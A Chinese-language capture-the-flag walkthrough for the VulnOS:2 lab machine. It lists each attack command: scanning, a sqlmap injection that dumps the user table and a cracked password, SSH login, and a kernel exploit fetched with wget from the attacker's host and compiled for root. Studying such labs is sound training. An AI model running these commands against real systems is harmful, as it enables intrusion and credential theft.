虚拟机信息:
虚拟机下载地址:
https://www.vulnhub.com/entry/vulnos-2,147/
虚拟机简介:你的任务是对公司网站进行渗透测试,获取系统的根目录并读取最终标志
目标:1个flag
级别:中级
1、主机探测
1、通过netdiscover检测主机IP地址
arp-scan 192.168.1.0/24
2、服务探测
1、通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.1.5
查看开放20、80、6667端口
3、渗透测试
3.1 HTTP渗透
1.访问站点信息如下
访问80端口页面未发现有用信息
2.目录访问测试
dirb http://192.168.1.7
未发现有用信息
3.目录探测
nikto -host http://192.168.1.7
未发现有用信息
4.查看网页源代码
发现超链有/jabc
5.使用nikto进行探测
发现有安装页面
6.查看其他页面
在Documentation页面中,查看网页源代码,发现有一个超链,并提示guest账号登录
7.使用guest进行登录
8.查看系统版本信息
查看版本为:OpenDocMan v1.2.7
9.搜索应用漏洞
searchsploit OpenDocMan 1.2.7
cat /usr/share/exploitdb/exploits/php/webapps/32075.txt
注入类型为SQL注入
3.2 爆破数据
1.使用SQLmap进行测试
sqlmap -u "http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --risk=3 --level=5 --dbs --threads=4 --batch
2.爆破数据库
sqlmap -u "http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --risk=3 --level=5 --threads=4 --tables --batch
3.爆破列内容
sqlmap -u "http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --risk=3 --level=5 --threads=4 -T odm_user --batch --columns
4.爆破用户名和密码
sqlmap -u "http://192.168.1.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --risk=3 --level=5 --threads=4 -T odm_user --batch -C 'username,password' --dump
5.解密webadmin
解密后获取密码为:webmin1980
3.3 主机渗透
1.尝试用户和密码登录SSH
ssh [email protected]
SSH登录成功
2.查看系统版本
lsb_release -a
uname -a
3.查找系统漏洞
searchsploit ubuntu 14.04 kernel 3.13
4.创建简单http服务
cp /usr/share/exploitdb/exploits/linux/local/37292.c ./
python -m http.server 8080
5.主机下载文件编译
wget http://192.168.1.6:8080/37292.c
gcc 37292.c -o ofs
./ofs
6.查看flag
cd /root
cat flag.txt
原文始发于微信公众号(安全孺子牛):OSCP难度靶机之VulnOS:2
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论